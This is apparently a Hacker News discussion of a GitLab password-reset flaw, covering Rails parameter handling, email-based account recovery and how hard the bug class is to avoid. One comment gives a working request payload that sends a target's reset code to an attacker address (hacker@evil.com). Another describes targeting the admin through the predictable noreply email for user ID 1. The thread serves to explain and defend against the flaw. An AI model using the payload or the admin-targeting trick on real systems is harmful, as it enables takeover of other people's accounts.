I don't know the history of this bug, but I just want to chime in with a word about how absolutely terrifying the "associate email address with account" feature in account-based web apps is. I guess that is my word: terrifying. It's one of the things pentesters make a beeline for, with a vulnerability history stretching all the way back to the early 2000s, when these features were often implemented on standard Unix MTAs that could be tricked into sending password resets to multiple addresses at once. Featureful web frameworks seem to have resurrected that attack in Gitlab.
If you're a normal HN reader who found themselves interested in this story, go check your password reset feature, specifically the email association logic!
Gitlab has, as I understand it, a pretty excellent security team, which gives some sense of how hard this bug class is to avoid.
> Gitlab has, as I understand it, a pretty excellent security team, which gives some sense of how hard this bug class is to avoid.
Based on the other comment that describes how this bug works, it is completely trivial to avoid. If you use a statically typed language, you'd have to go out of your way to create this bug, and it'd stand out like a sore thumb in code review, to the extent that if I saw that I might wonder whether my coworker is actively trying to create a backdoor.
The suggestion would more be to choose the correct technology from the start. Something like Scala is 20 years old, has a massive library ecosystem since it integrates with Java, and has type inference so it basically feels like a dynamically typed language, except bugs like this can't happen. It's also high performance thanks to the JVM. I don't know what it was like when Gitlab launched in 2014, but I know it was very solid in 2017 when I started using it. Or if that feels too hipster/niche, just use Java. It's not my cup of tea, but it's boring, practical, and the developer pool is infinite.
I've written a lot of Scala, and really like the language (well, aside from them not ditching null and exceptions entirely), but years ago I stopped recommending it for new projects, especially in a corporate setting. It's hard to hire experienced Scala developers, and most Java developers I've worked with were either completely uninterested in writing Scala at all, or didn't care to learn the language well enough to actually make use of its better features, and somehow ended up writing Scala that looked like worse Java than the Java they'd usually write.
It's not actionable for Gitlab, but it's actionable for anyone weighing what technologies they should use for future projects. Use one that doesn't open you to this kind of mistake, and ignore people who talk about "productivity" because that's going to be people arguing about their gut feelings anyway, and everyone will say their chosen stack is more productive.
Something like Java is going to have the largest hiring pool, the largest ecosystem, and support from every major vendor. I don't particularly like it and think that Scala is pretty much a straight upgrade, but Java's a smart choice.
You get that the track record of Java and Java frameworks on web vulnerabilities is pretty abysmal, right? There's a whole gigantic RCE bug class (RCE! in the 2020s!) that originates there.
My general take is: glass houses, etc. And: everybody is in a glass house.
I'm not sure what you mean with the bug class; Java serialization? If so I think that's been something where common advice is not to use it for 20+ years.
Maybe Spring has had issues. Like I said I don't actually like Java and all the annotation stuff. I avoid it, but it's still going to be one of the more robust choices you can make since every major enterprise uses it. Java had log4shell, which was pretty bad, and probably wouldn't have happened if Java had had string macros. It's one of the reasons why Scala is a better language: people use things like compile time macros which prevents those sorts of mistakes. It looks like akka-http for example has only had DoS vulnerabilities (e.g. getting zip bombed) + some niche stuff like request smuggling if you used it to build a reverse proxy or usage of directory listing on Windows.
That said, sure, large frameworks all have bugs. But not being able to tell whether you are dealing with a string or an array in your business logic is just silly.
If you like Java, use Java. Don't worry about people pointing out how gnarly the security track record is; the security track record of every popular thing is gnarly. I'm not here to tell you what framework to use, only that empirically, you're not going to improve your odds significantly by choosing a different mainstream framework.
I don't like Java and I don't consider jobs where I'd be doing a nontrivial amount of Java. But the original comment I replied to said this class of bug is hard to avoid, and it's not. Use any statically typed language, and it can't happen. Java's the obvious choice. C# is probably fine too.
Same with something like SQL injection or log4shell. These are also preventable using string formatting macros. If `DatabaseConnection.run` takes a `SqlQuery`, not a `String`, and you can only make a `SqlQuery` through a safe API, and your escape hatch is a macro that does query parameterization instead of string substitution, then your users can't get it wrong. This is how Scala libraries actually work and have worked for years. Similarly if you build your logging library to take MDC objects that are built with format macros. These are solved problems.
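A minimal Ruby sketch of that "you can only make a SqlQuery through a safe API" idea (the class and method names here are hypothetical, and unlike the Scala macro version the guarantee is runtime-only, since Ruby has no compile-time checking):

```ruby
# Hypothetical sketch: a query type whose only public constructor
# takes placeholders plus bind values, so string concatenation of
# user input never reaches the database.
class SqlQuery
  attr_reader :sql, :binds
  private_class_method :new  # raw construction is forbidden

  def initialize(sql, binds)
    @sql = sql
    @binds = binds
  end

  # The one safe way in: a parameterized statement. The placeholder
  # count must match the bind count, so nothing can be smuggled in.
  def self.parameterized(sql_with_placeholders, *binds)
    unless sql_with_placeholders.count("?") == binds.size
      raise ArgumentError, "placeholder/bind mismatch"
    end
    new(sql_with_placeholders, binds)
  end
end

q = SqlQuery.parameterized("SELECT * FROM users WHERE email = ?", "a@b.c")
q.sql   # => "SELECT * FROM users WHERE email = ?"
q.binds # => ["a@b.c"]
```

A hypothetical `DatabaseConnection.run` that accepts only `SqlQuery`, never `String`, then makes injection a type error at the API boundary rather than a code-review hope.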
This is a logic bug, not a typing bug. One clear way you know this is: this bug occurs in both Java and C# applications, routinely. But that's OK! I'm not going to dunk on you for using C#, even though it is practically the ground spring from which all web app vulnerabilities have emerged (you'd think it'd be PHP, but C# has a better claim to the title).
Typing bugs are just logic bugs that you were able to encode into the type system, and therefore the checker is able to reject for you. Types are propositions and values are proofs. This is not just an academic fact; my SqlQuery example is a direct practical application.
The claims being that SQL injection is a problem with a known solution, that Scala does it right, and that it's an example of turning logic errors into type errors.
Please do not put C# into the category of languages that have issues with SQL injections - pushing raw unparametrized SQL through EF Core in the past required going out of your way to use explicitly discouraged API prefaced with warnings.
Today, it has been superseded by FromSql which uses string interpolation API so that it is transformed into safe parametrized queries without any explicit action from the user.
Good to hear. Java also recently added the ability to make custom string interpolators with that exact use-case in mind. I know C# has LINQ, which is similar to query monads in Scala, but IMO using string interpolators tends to be cleaner for more complex queries.
Right now I'll just say that from 2005-2015, Java and C# applications were literally the bread and butter of every application security shop (house accounts for web appsec firms were Fortune 100 companies that built all their line of business apps in those two languages), and password reset bugs were one of the first places you'd look. I think I even included password reset in a "Seven Deadly Features" blog post I wrote at Matasano.
None of that is a reason to avoid C#! I'm not trying to say that using the two most fertile sources of web application security vulnerabilities over the last 20 years is per se a bad decision!
It doesn't sound like they have a great security team, they added the "Associate a secondary email address" feature recently. This isn't something that has always been in the software. It seems more like they were cutting corners and not properly testing through ways to exploit their own new feature when it was related to account security.
On top of that it looks like they had a 9.6 CVE that allowed integrations to perform commands as other users...
From the outside it looks like they are trying to ship features faster than they can keep them safe and tested. Perhaps because they are having an incredibly difficult time monetizing well? It makes sense from business standpoint in some respects, but also the security stuff could just absolutely tank the business when the whole point of a (self)hosted git solution is essentially just account management.
I don't put much stock in this "9.6" stuff; CVSS is a ouija board that will say whatever people want it to say. But regardless: the best security teams in the world still see critical vulnerabilities in their software, because software is all garbage.
I've recently stopped two design choices in external facing resources that posed significant security risks.
One of which was around credentials resetting to emails that aren't stored in the API auth system itself, but rather come into Salesforce as a support case. "Don't worry, a support team member has to action the request" was meant to be reassuring, until I explained that this translated to "the only mechanism in place to prevent credentials being stolen comes with a massive social engineering vulnerability".
But it's the previous choices I haven't come across yet that worry me.
A few years ago there would be people defending GitLab for “transparency” every time something went wrong.
They even went overboard with the transparency and made some Slack conversations public, which for me would have made it one of the worst places to work.
> It doesn't sound like they have a great security team
That's an unfair comment. Even the best teams ship bugs. If you want to measure the quality of a security team, you look at their performance trajectory (for both detection and response) relative to the size of their total threat surface.
All I needed to know about the quality of software Gitlab ships can be found by using their CI system on any half-decent-size project. You can tell it was half-baked, with many bugs and edge cases that could easily have been avoided. When you look at the bug tracker, all of them have been documented for years and they just ignore them.
My favorites are
* Included files that produce no jobs count as a failure. The only real workaround is adding a noop job all over your CI config.
* Try to use code reviewers based on groups. The logic is so complex and full of errors I can't even explain it unless I spend an hour reading the docs.
* When using merge trains with merged results pipelines enabled, you end up with two different jobs per commit. That would be fine, except the UI always shows merged results first; if you have ten commits, you need to look on the second page to find the most recent commit's CI jobs. That is just annoying, but worse, the environment variables identifying which MR or commit a job belongs to don't line up between the two, which makes doing trivial things like implementing break-glass pipelines almost impossible.
Anyway, Gitlab sucks. I wanted to not use GitHub, but really, it's just bad. Not to mention we have outages monthly that we always know of 30 minutes to an hour before Gitlab does; then we look at the status page and see the downtime listed as 10 minutes when it's been 40 for us and likely everyone else. In the last year we've had close to 2 full days combined of downtime from Gitlab. Of course they report 99.95% uptime.
GitHub post-Microsoft was also a major pain for adding code review for groups that were not a per-project, manually curated list of users.
There were some "addons" like panda-something that made it less bad, but still a crap fest in terms of usability and compliance.
Not to mention that now you can barely use it without being logged in. I'm overall glad to have moved to Gitlab and Codeberg. Do not miss GitHub AT ALL.
What a strange perspective. If not e-mail, then what would you associate it with? I've been running a site for over 20 years with a large user base. We initially used usernames, but it was disastrous. Everyone knew each other's usernames, making it easy to attempt brute force attacks on passwords, reset them, etc. Using e-mails isn't the problem; the issue is overcomplicating the login and password recovery logic: tons of abstraction everywhere, overengineering, people rushing to push code without proper checks in security-sensitive parts, etc.
> Gitlab has, as I understand it, a pretty excellent security team, which gives some sense of how hard this bug class is to avoid.
You should examine the history of security issues on GitLab. There are critical exploits multiple times a year, requiring an urgent upgrade of your GitLab deployment. Gitlab is the worst product I've used, security-wise.
You took the wrong thing away from the comment. I'm not saying you shouldn't do email password resets. We do. Everybody does. I'm saying: be ultra careful with that code.
Gitlab is both open source and has an on-prem product, so my guess is that you're simply hearing about more of the Gitlab bugs than you would with a comparably sized competitor.
> Gitlab is both open source and has an on-prem product, so my guess is that you're simply hearing about more of the Gitlab bugs than you would with a comparably sized competitor.
It seems you might not be using their on-premises product, considering your guesswork. We used it for years and it was a nightmare. Almost every upgrade was problematic, and we often had to scour through GitLab issues to find solutions from other users. These solutions were often makeshift and carried the risk of causing further issues. Their salaries are below market rate, which is reflected in the quality of staff they hire (there are a few exceptions). I prefer not to point fingers, so I won't link to any specific discussions from GitLab. It's worth noting that they have a culture of open discussion, and from what I've observed, the engineering quality in some of the teams was quite low. We utilize numerous other large scale open source projects in our stack and have never encountered as many problems as we did with GitLab.
What guesswork? I use GitHub. My point is that you don't hear about most vulnerabilities in SaaS products, because there is no norm of disclosing them. But disclosure is unavoidable for open source on-prem products.
> My point is that you don't hear about most vulnerabilities in SaaS products, because there is no norm of disclosing them. But disclosure is unavoidable for open source on-prem products.
I already addressed that point, explaining that we use other on-premises open source products of similar size, and GitLab was the poorest in terms of quality. I haven't drawn any comparisons between GitLab's on-premises and SaaS products, so I'm puzzled as to why you continue to 'guess' the reasons behind our experiences, especially when those guesses have been evidently incorrect.
What's your deployment model? I've had it deployed on Kubernetes for 100 users since June 2019 and it's been painless. We upgrade every month, it's usually just a helm upgrade gitlab/gitlab -f values.yaml
Once a year they do a major release, usually around May, and I need to upgrade Postgres or Redis but that's the extent of it.
I tend to agree. Regarding Gitlab, there’s a bit of a dichotomy here. On one hand it’s good that they’re diligently catching and patching these things quickly and effectively notifying with transparency, that’s a great thing. On the other hand, it means Gitlab is an absolute nightmare to maintain, the process to upgrade it is not always trivial and to add to that, consistently, the day after a Gitlab upgrade a critical vulnerability is found and patched.
Every product has security issues, and what should worry you more: things that never see security patches, or something that does?
Gitlab upgrades, omg, that was a nightmare: so many broken upgrades. There are literally thousands of issues on their issue tracker just about problems with upgrades.
Yeah, every single time I get a spurious password reset email (presumably from someone trying to hijack my account), I'm worried they've somehow managed to add an unauthorized recovery email address outside of my control. It hasn't yet happened to me, but as we can see from this story, it is absolutely possible unfortunately.
I can't remember getting something like that. Maybe because I use a different e-mail address for signing up to services than for regular communication.
I just had an idea, maybe using a + alias (yourname+some-alias-address@example.com, made famous by gmail) could help against attackers. Even if they find out your email they will never guess the part after the plus. If you forget it though then you can't reset your password anymore either.
> If you forget it though then you can't reset your password anymore either.
If you struggle with memorizing your username/email, there's a near zero chance you're using a password manager, which also means there's a near zero chance you're using decent passwords for your logins, in my experience.
It happened more than once that I didn't store a login to the password manager correctly. Either mixed up something while editing, or forgot to save it at all, or accidentally deleted an entry, and only noticed years later (long after old backups were overwritten).
Or it could open you up to other attacks when the service coalesces all those emails into one canonical form (to uniquely identify you or whatever), but does so differently than the actual email provider, allowing anyone and their dog to create an email address that collides with yours. (Note that almost no online service recognizes the significance of capitalization in the email address you use as a username, for example, while the underlying email provider sometimes does.)
Allowing anything other than a-z, 0-9, and a few characters like - _ . in the name part of an email address is pure madness. If the mail provider treats User@domain as a different address than user@domain, and delivers them to different customers, that is simply asking for trouble, even if it's standards-compliant behavior.
As a less contrived example then, consider "andix.hacker@foo.com" vs "andix..hacker@foo.com". Some email service providers canonicalize those to the same thing, and some don't.
Your service using emails for logins or adspam or whatever now faces a choice. You probably have to accept periods, and you probably don't want to try to hard-code all the different ways a period might be used legitimately as opposed to a typo, so you have to deal with that problem somehow. You can canonicalize (opening yourself up to hijacks, some unintentional as legitimate users just have emails that clash in your system), or not (potentially locking out some users).
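To make the collision concrete, here's a sketch of Gmail-style canonicalization (an assumption: this mimics the commonly described Gmail rules of dropping dots and plus-suffixes in the local part; it is not any provider's actual code):

```ruby
# Hypothetical Gmail-style canonicalization: lowercase everything,
# strip a "+suffix" from the local part, and delete its dots.
def gmail_canonical(address)
  local, domain = address.split("@", 2)
  local = local.split("+", 2).first.delete(".")
  "#{local.downcase}@#{domain.downcase}"
end

gmail_canonical("andix.hacker+spam@Foo.com")  # => "andixhacker@foo.com"

# The hijack risk: two addresses a stricter provider treats as
# distinct mailboxes collapse to one key under this scheme.
gmail_canonical("andix..hacker@foo.com") == gmail_canonical("andix.hacker@foo.com")
# => true
```

If your service keys accounts on the canonical form but the user's actual provider delivers `andix..hacker@` and `andix.hacker@` to different people, one of them can collide with the other's account.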
Actually, I find the Gmail features the opposite of helpful, because websites aren't aware of them and will happily treat addresses using them as unique when in fact they aren't. I have my username @ gmail (since the very early days, when you needed an invite). At least once a week I get somebody's receipt or confirmation because they enter an email like tyler.e@
This could happen when the owner of a domain loses or drops it, and a bad actor picks it up.
All they have to do is set up a SMTP server and wait for junk mails, thereby learning about the e-mail addresses. Say Walmart sends some flyer. Poof, they have that user's e-mail, and the fact they are registered with Walmart.
I'm guessing here, because I only read a high-level description of it, but I think it's a password reset flow endpoint that takes the email address to look up and send a reset to, and the framework will accept an array instead of a simple string; the endpoint looks up the first address, but the variable used to determine who to send the reset mail to is the array. Again: just a guess as to the underlying bug (I've seen that specific bug before is why I guessed).
The vulnerability lies in the management of emails when resetting passwords. An attacker can provide 2 emails and the reset code will be sent to both. It is therefore possible to provide the e-mail address of the target account as well as that of the attacker, and to reset the administrator password.
Here's an example payload:
user[email][]=my.target@example.com&user[email][]=hacker@evil.com
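As a guess at the shape of the code behind that payload (a hypothetical sketch, not GitLab's actual implementation): Rack-style parsers turn `user[email][]` keys into a Ruby array, the lookup succeeds if any supplied address matches a known user, and the tainted parameter is then reused as the delivery list:

```ruby
# Rack would parse "user[email][]=a&user[email][]=b" into a nested
# hash whose "email" value is an Array, not a String:
params = { "user" => { "email" => ["my.target@example.com", "hacker@evil.com"] } }

# Toy user store standing in for the database.
USERS = { "my.target@example.com" => { id: 1 } }

def find_user(email)
  # Matches if ANY supplied address is known, mirroring an ORM
  # `where(email: [...])` lookup that compiles to SQL IN (...).
  Array(email).each { |e| return USERS[e] if USERS.key?(e) }
  nil
end

sent_to = []
email_param = params["user"]["email"]
if find_user(email_param)
  # BUG: the *tainted* parameter is reused as the delivery address,
  # so the reset mail fans out to every address in the array.
  Array(email_param).each { |addr| sent_to << addr }
end
# sent_to now includes the attacker's address alongside the target's
```

The fix in the actual patch is exactly what you'd expect from this sketch: stop passing the user-supplied value to the mailer and let it use the address on record.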
Strong parameters has been a core security feature of Rails for a long time, and all the guides go into detail about the boilerplate you need just to accept a form input past the strong parameter filters. It's weird to me that the pattern doesn't also include a "must be a string" option. I know you can add to_s everywhere, but making it part of the existing strong params would actually incentivise use.
It's weird, as I recall with strong params one of the only things it really makes you decide is whether a value is a scalar, array, or Hash. You can certainly allow a value to be scalar or array, but it's not very natural in strong params.
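For what it's worth, a plain `permit(:email)` does only let permitted scalar types through, so an array value would be silently filtered. A minimal sketch that mimics (not reuses) that filtering behavior:

```ruby
# Sketch of the scalar-only filtering that Rails' strong parameters
# applies for `params.permit(:email)` (assumption: this imitates
# ActionController::Parameters' behavior, it is not that class).
PERMITTED_SCALARS = [String, Symbol, Numeric, TrueClass, FalseClass].freeze

def permit_scalar(params, key)
  value = params[key]
  # A bare key like `:email` permits scalars only; an Array (the
  # `user[email][]` smuggling payload) is dropped, never forwarded.
  PERMITTED_SCALARS.any? { |t| value.is_a?(t) } ? value : nil
end

permit_scalar({ "email" => "a@example.com" }, "email")
# => "a@example.com"
permit_scalar({ "email" => ["a@example.com", "b@evil.com"] }, "email")
# => nil
```

To deliberately accept an array in real strong params you have to opt in with `permit(email: [])`, which is exactly the kind of explicit signal a reviewer can catch.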
I mostly hate the way strong params gets used - it's a bad compromise between letting Ruby people do Ruby things and trying to plug up a category of vulnerability that's been biting rails apps for a decade. Now I do all my api definitions in openapi and it's way easier. I haven't tried it with a rails app but I think it'd work well there.
This is such a rarely used feature that I wonder if it would be helpful to have a CSP or preflight header that restricts the browser from sending multiple values for the same parameter.
It's a great feature that's been supported by browsers for decades. <select multiple> uses it. You can use it for checkboxes to select multiple items too.
If you changed it now you would break a whole lot of stuff.
You wouldn't need to change it. But if you made it a CORS header like Access-Control-Allow-Headers, then websites would be able to provide a default policy forbidding it so that their code that actually requires it would need to explicitly opt into the behavior.
There is precedent for deputizing the browser to stop this kind of bug with Access-Control-Allow-Headers. If the backend wants to default to ignoring multiple GET/POST parameters with the same name, then the browser could helpfully fail to make a request that attempts to send them.
The attacker doesn't use a compliant browser to make the request. User-agent protections only help in situations where a regular user (or their software) is being tricked.
Properly used white list parameter controls (i.e., strong parameters) that are the default Rails behavior at this point would have prevented this bug completely.
This is a little like saying the best way to avoid this bug is to not have the bug. But that's true of all bugs. The C apologists used to say, "just bounds check properly!"
Content Security Policy is a User-Agent feature. The vulnerability here is server-side. A malicious actor exploiting this will be using their own HTTP client that does not respect a CSP.
I think I'd count that as a bug and a design error.
The bug is accepting an array when it should only take a scalar.
The design error is that the endpoint should not be taking email addresses at all. It should take account IDs.
Even if a system uses email addresses as account IDs they are conceptually not the same and the code should not muddle them.
Keep them separate and then even if you get an "allows an array where it should have been a scalar" bug the result should be either just the first account in the array gets a reset email or all the accounts in the array that are existing accounts get reset emails for their accounts.
If they have to allow lookup by email I don't understand why they wouldn't throw out the input data. They should only ever have had a function to send password reset that takes a user ID and uses the email on record from the database.
I think it is OK to call the account ID "Email Address" on everything the user sees, and make it the same string as the user's email address. As far as the user is concerned they login with email address and password.
I'm just saying that in the software and in the database store account ID and email separately. Treat the fact that the account ID column matches the email address column as just a coincidence that you do not take advantage of.
I'd enforce not taking advantage of it by having employee accounts actually use an account ID that does not match their email address, such as their name, so that if we accidentally leave out a call to EmailFromAccountID(...) somewhere and try to use an account ID directly as an email address it will break employee accounts.
Also, it is not clear to me that even with a user-visible account ID that is not the same as the email address, it would take two email round trips.
The reset page could take email address, not account ID. The reset endpoint could then look up the account ID from the email address, and initiate the reset, calling the SendEmailToAccount service with the account ID to send the email. That service would look up the email address for the account.
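A sketch of the flow described above, with hypothetical names like `send_email_to_account`: the user-supplied value is used only as a lookup key, and the delivery address is always re-read from the record.

```ruby
# Toy stores standing in for the database: accounts keyed by ID,
# plus an index from email to account ID for the lookup step.
ACCOUNTS = { 42 => { account_id: 42, email: "victim@example.com" } }.freeze
EMAIL_INDEX = { "victim@example.com" => 42 }.freeze

def send_email_to_account(account_id, outbox)
  # Delivery address comes from the record, never from request params.
  account = ACCOUNTS.fetch(account_id)
  outbox << account[:email]
end

def initiate_reset(submitted_email, outbox)
  account_id = EMAIL_INDEX[submitted_email]
  return unless account_id
  send_email_to_account(account_id, outbox)
end

outbox = []
# An array isn't a valid lookup key, so the smuggling payload
# fails closed: no account found, nothing sent.
initiate_reset(["victim@example.com", "attacker@evil.com"], outbox)
# A plain string works, and only the on-record address is mailed.
initiate_reset("victim@example.com", outbox)
# outbox == ["victim@example.com"]
```

Even if the lookup had been array-tolerant, the worst case here is a reset mail to each matched account's own on-record address, which is the containment the comment above is arguing for.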
Oh, sure. Storing the email address in a canonical column and using the provided address as a key helps. But I think the underlying bug is still there, because the email code will still _accept_ the user input if you feed that to it.
Personally, I like when people have usernames, and have to enter those, to receive a recovery message sent to the associated email.
Or better yet, enter both username and email together.
Because it's more likely the attacker won't know both.
In any event, I have been recommending to everyone for years to use email aliases (that GMail and others support) as your login. Have a different one for each site, for example yourname+az@gmail.com for amazon. That way, you can avoid crap like this which is out of your control, since the attacker won't even be able to repeat your login email: https://www.wired.com/2012/08/apple-amazon-mat-honan-hacking...
> Gitlab has, as I understand it, a pretty excellent security team, which gives some sense of how hard this bug class is to avoid.
I disagree. It's a bonehead mistake to send password resets out to tainted email addresses. As this was an authentication change it should have received extra scrutiny and so have been even harder to introduce.
Something is wrong with their engineering culture that needs correcting.
Every time we get a story about a vulnerability, we get comments about how they're indications that engineering cultures need correcting. All I'll say is, the impression one gets is that every engineering culture needs correcting. I buy it!
From my experience, people say "engineering culture" when what they actually mean is management culture. It's not typically the engineers that are the problem.
- recoverable.send_reset_password_instructions(to: email) if recoverable&.persisted?
+ recoverable.send_reset_password_instructions if recoverable&.persisted?
Haha, the first thing I would've caught in the initial PR was the file name... and the default setting of `confirmed: true`... seems like a big oversight, or possibly an inside job (if I'm being conspiratorial).
Initially a single email could be passed into the API/form call and they would look it up. If found they would send a recovery to that email but it was the email the user supplied not what was in the DB.
Oh, no problem we looked it up so they are the same!
But then the ability to look up accounts from a list of emails was added. If any email matched, the account lookup would succeed. Then they sent the reset link to that same user-supplied value, but OH NOEHS IT'S AN ARRAY NOW AND SOME MIGHT NOT HAVE MATCHED ACCOUNT EMAILS!
So they ended up sending out reset links to a tainted list of emails.
Rails "concerns" are the worst IMHO anyway, but looks like they aren't using strong params here either which is even worse. Also someone thought it was more elegant to reuse the tainted value which is par for the RoR course.
I got hit by this, we also noticed it being used with a second “feature” that exposed us a bit more than it should have.
Basically a requirement for this attack is to know the email of the user you want to reset, but, there is a hidden email address that is tied to your gitlab userid (a number incrementing from 1).
Since it's a safe bet that ID 1 or 2 is an admin, that's a good target.
The email is something like 1-user@mail.noreply.<gitlabhost>.
E-mail password reset is a security nightmare even when implemented correctly.
And the worst part: on most services you can't even disable it; often the only way around it is Enterprise SSO.
On some services you can set up a phone number for SMS token instead. But I've never seen the possibility to require both. Password reset only with e-mail AND SMS token.
There's really nothing about the e-mail system that makes it particularly good for anything secure at all.
- Easy to accidentally forward confidential tokens
- Validation of email sender authenticity is still piecemeal, and there are relatively frequently ways to bypass or work around validation.
- Mail is not end-to-end encrypted. I hope that it's at least encrypted with TLS, but last time I actually messed with talking directly to an MX, it seemed like TLS was still limited to smart relays, and actual mail delivery always went to port 25 as usual...
- The cardinality of e-mail addresses is not really defined anywhere. Gmail has plus addressing and ignores periods for the purposes of delivering an e-mail. Meanwhile, Google Workspace defaults to not ignoring the periods. Pretty sure some mailbox providers are case-sensitive and others are not. This means you can't know if an e-mail address at a given provider is unique. Best bet is to treat the entire damn address as a bag of bytes, but that opens up room for UX issues of all sorts, so it's hard to balance.
- It's bad that if your e-mail address gets compromised, any account you have that doesn't have some kind of secure 2FA is literally seconds away from being compromised, too. Obviously, this is not a limitation that is limited to e-mail addresses, people wrongly treat SMS as secure, too. The thing with e-mail addresses though is that they're easier to treat as secure because it is somehow still less of a crapshoot than cell carrier security, and also because literally the majority of online accounts can be stolen with just access to the user's email address, and it can be done quickly and easily, and in many cases it can be hard to convince support that you are the correct owner afterwards.
First, because email is not a secure form of communication; there are many ways email content can be leaked. Sending a password reset link via email is similar to sending passwords or credit card information via email. Funnily enough, nobody does that, because it's considered unsafe.
And second, because hijacking someone's email account opens up a lot of different services to the attacker. 2FA over IMAP is still not a thing with most services/clients, some people log into their webmail with username/password on untrusted devices, ...
Ruby on Rails accepts arrays as parameters to the ORM's ".where(...)", which means "OR" between the array values. So if the code does something like "User.where(name: name, password: password)", I could totally see this happening.
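A sketch of how hash conditions widen when handed an array (a simplified re-implementation for illustration, not ActiveRecord itself):

```ruby
# ActiveRecord-style hash conditions: a scalar value compiles to an
# equality check, while an Array silently widens to IN (...), i.e.
# an OR across every element.
def to_sql_condition(column, value)
  if value.is_a?(Array)
    "#{column} IN (#{value.map { '?' }.join(', ')})"
  else
    "#{column} = ?"
  end
end

to_sql_condition("email", "a@example.com")
# => "email = ?"
to_sql_condition("email", ["a@example.com", "b@evil.com"])
# => "email IN (?, ?)"
```

So if request params can carry an array where the code expects a string, a `User.where(email: params[:email])` lookup quietly changes meaning from "this user" to "any of these users", which is exactly the widening this bug class exploits.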
I work for a huge government owned telco and our networking guys are the best. They keep us server guys in line. So even though they did expose our Gitlab to an extent, for certain external projects and consultants, you still can't visit it from the internet freely.
And also we manage users in AD so there is no SMTP connection to even do password resets.
But we really need to enforce more 2FA, we've left it up to each project to enforce their own rules on 2FA.
Especially something like Gitlab might benefit a lot from external integrations that need to call the Gitlab API. It might be possible to whitelist exactly those requests, but also a bit cumbersome.
Sorry, but it is really easy to automate Gitlab updates. Just one option is to run Gitlab in Docker with Compose, which works rock-solid, and have something like Watchtower do the updates daily. I have two Gitlab servers that have done this for 7+ years with no issues whatsoever. Looking around, I see so many outdated Gitlab instances; what are the administrators doing?
Can we please stop pretending that Ruby/Rails is in any way a good choice for software that needs to be safe?
I do understand that it is what it is and GitLab has to deal with it, but going forward, can we stop pretending a language and framework that prioritizes cleverness and hidden control flow is better than something more boring?
If I sound overly-annoyed it's because I have to work on a production Ruby codebase where I can absolutely see a scenario in which we have similar issues just waiting to be exploited, because someone thought seventeen layers of abstraction made the code super extensible.
Any language or framework that lets the caller specify if a parameter may be a string or an array of strings should probably be avoided, IMO. The cost of this one error likely outweighs the total value realized by use of the feature.
I think that magic links are a decent alternative, as are passkeys (for web) or similar (for non-web). SSO is fine, but just centralizes the problem (like magic links do).
I just see adoption of any of these taking a long time.
SSO centralizes the problem to somewhere that can require hardware-based auth, e.g. passkey, Yubikey, etc. Passwords are fine if they're combined with hardware-based auth. Expecting every vendor to implement passkeys etc. natively isn't going to happen.